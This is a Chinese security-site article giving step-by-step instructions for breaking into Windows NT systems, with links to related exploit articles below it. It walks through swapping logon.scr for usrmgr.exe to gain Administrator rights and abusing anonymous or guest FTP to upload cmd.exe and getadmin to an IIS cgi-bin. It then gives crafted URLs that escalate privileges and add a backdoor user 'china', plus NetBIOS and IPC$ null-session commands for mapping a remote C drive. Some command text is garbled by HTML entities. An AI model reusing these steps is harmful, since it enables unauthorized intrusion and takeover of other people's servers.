经过测试,看来Administrastor,账户真的不安全

所属分类: 实用技巧 / 漏洞研究 阅读数: 1149
收藏 0 赞 0 分享
如果你有普通用户帐号,有个一个很简单的方法获取NT Administrator帐号: 


先把c:\winnt\system32下的logon.scr改名为logon.old备份 


然后把usrmgr.exe改名为logon.scr 


然后重新启动 


logon.scr是启动时加载的程序,重新启动后,不会出现以往的登陆密码输入界面,而是用户管理器 


这时他就有权限把自己加到Administrator组 


不要忘记把文件名改回来啊! 

之二: 


下面的技术适用于不重视NT网络安全的网站, 


一些 http的技术也可以供较高级的人员参考 


进入NT网络可以采取下面的步骤: 


因为NT的IIS server的ftp一般都是允许anonymous匿名帐号进入的,有些anonymous的帐号还有upload权限,我们就要攻击这类站点。因为如果不允许匿名帐号,就可能造成明文密码在网上传输。用tcpspy的工具可以截获这些密码。现在不谈这些比较高级的技术。 


正因为允许匿名帐号ftp登陆的设定,也给我们带来了突破NT server的机会。我们用ftp登陆一个NT server,比如:www.xxx.com(示例名): 


ftp www.xxx.com 


Connected to www.xxx.com 

ntsvr2这个东西暴露了其NETbios名,那么在IIS的背景下,必然会有一个IUSER_ntsvr2的用户帐号,属于Domain user组,这个帐号我们以后要用来获取Administrator的权限 


User (www.xxx.comnone)):anonymous 

Password: 输入 guest@ 或者guest 

对于缺乏网络安全知识的管理员来说,很多人没有将guest帐号禁止,或者没有设置密码。那么guest帐号就是一个可用的正确的用户帐号,虽然只属于Domain guest组 


在这种情况下我们就可以进NT server的ftp了。 


进去以后,看看目录列表,试试 cd /c 或wwwroot等关键目录,如果运气好,改变目录成功,这时你就有了80%的把握。 


现在,开始查找cgi-bin目录(或者scripts目录),进去以后, 


把winnt下的cmd.execopy到cgi-bin,把getadmin和gasys.dll传上去到cgi-bin 


然后输入:http://www.xxx.com/cgi-bin/getadmin.exe?IUSR_SATURN 


大约十多秒后屏幕显示: 


CGI Error  


这时有90%的可能是:你已经把IUSER_ntsvr2升级为Administrator,也就是任何访问该web站的人都是管理员 


下面可以add user: 


http://www.xxx.com/cgi-bin/cmd.exe?/c c:\winnt\system32\net.exe user china news /add  


这样就创建了一个叫china用户,密码是news,然后: 


http://www.xxx.com/cgi-bin/getadmin.exe?china 

或者 


http://www.xxx.com/scripts/tools/getadmin.exe?china 

你再用china的帐号登陆,就可以有最大的权限了,也可以用上面的cmd.exe的方法直接修改如果没有cmd.exe,也可以自己传一个上去到scripts/tools或者cgi-bin目录 

之三: 


用NT的Netbios技术扫描 


nbtstat -a http://www.xxx.com/ 


或者 


nbtstat -A http://www.xxx.com/ 


这样可以得到其域的共享资源名称 


net view file://www.xxx.com/ 


可以获得其机器的共享资源名称,如果有c盘 


net use f: file://www.xxx.com/c 


可以用f:映射其c盘 


net use $">\\111.111.111.111\ipc$Content$nbsp;"quot;"quot; /user:"quot;"quot; 

之四: Unix下移植过来的工具: 


Windows95"amp;98的用户可以用这个tcp/ip工具去抓tcp/ip连接中的包: 


WinDump95.exe 使用前还要下载这个库 Packet95.exe 


WindowsNT用户的版本 


WinDump.exe PacketNT.exe 
更多精彩内容其他人还在看

MySQL Proxy(解决注入的另一思路)

MySQL Proxy的主要作用是用来做负载均衡,数据库读写分离的。但是需要注意的是,MySQL Proxy还有个强大的扩展功能就是支持Lua语言——魔兽也是使用了Lua来开发游戏,据我所知网易也是——可以参见云风的博客。
收藏 0 赞 0 分享

phpwind管理权限泄露漏洞利用程序发布

phpwind是国内使用非常广泛的一款程序,由于在程序设计上存在错误,导致任何人可以取得前台管理员及斑主权限,做删除帖子等任意操作
收藏 0 赞 0 分享

分析NtGodMode.exe干了什么

NtGodMode.exe是通过打开LSASS.EXE进程msv1_0.dll模块空间里,然后搜索特征值8B 4D 0C 49之后第1个32 C0 这个32C0汇编码xor al,al,修改为B001对应汇编码mov al,1 为什么mov al,1,以后就不用密码了?
收藏 0 赞 0 分享

伯乐asp收信程序漏洞及利用程序利用代码

信息来源:邪恶八进制信息安全团队(www.eviloctal.com) 文章作者:fhod 发这个也是因为看了asm所写的新概念收信程序 箱子永远不会被黑
收藏 0 赞 0 分享

字符集导致的浏览器跨站脚本攻击分析

前言:这种利用类型的攻击早在06年就被安全研究人员指出,不过一直没有在国内重视。而由于我们国内大部分站点正是这种有漏洞的字符集,所以影响还是比较大,希望各大站快速修复。可以看看http://applesoup.googlepages.com/。
收藏 0 赞 0 分享

Search Engine XSS Worm

作者:余弦 来源:0x37 Security 有挑战才有意思,为了诞生个Search Engine XSS Worm,这里拿yeeyan做实验了。
收藏 0 赞 0 分享

CPU也有远程攻击漏洞 英特尔匆匆修补

BEAREYES.COM 北京 [ 翻译 ] 作者:1000years 日期:2008年08月12日
收藏 0 赞 0 分享

暂时屏蔽 IE 最新 0day的4 种方法

IE 最新 0day 波及了微软全线系统居然在2008年12月14日8:00:15还没有出补丁!我查看微软站点,好像有几个手动操作的办法暂时屏蔽。
收藏 0 赞 0 分享

Sql Server 应用程序的高级Sql注入第1/2页

这篇文章讨论常用的"sql注入"技术的细节,应用于流行的Ms IIS/ASP/SQL-Server平台。这里探讨有关这种攻击各种可以注入程序访问数据和数据库防范的方法。
收藏 0 赞 0 分享

ASP木马后门新思路

ASP木马后门新思路
收藏 0 赞 0 分享
查看更多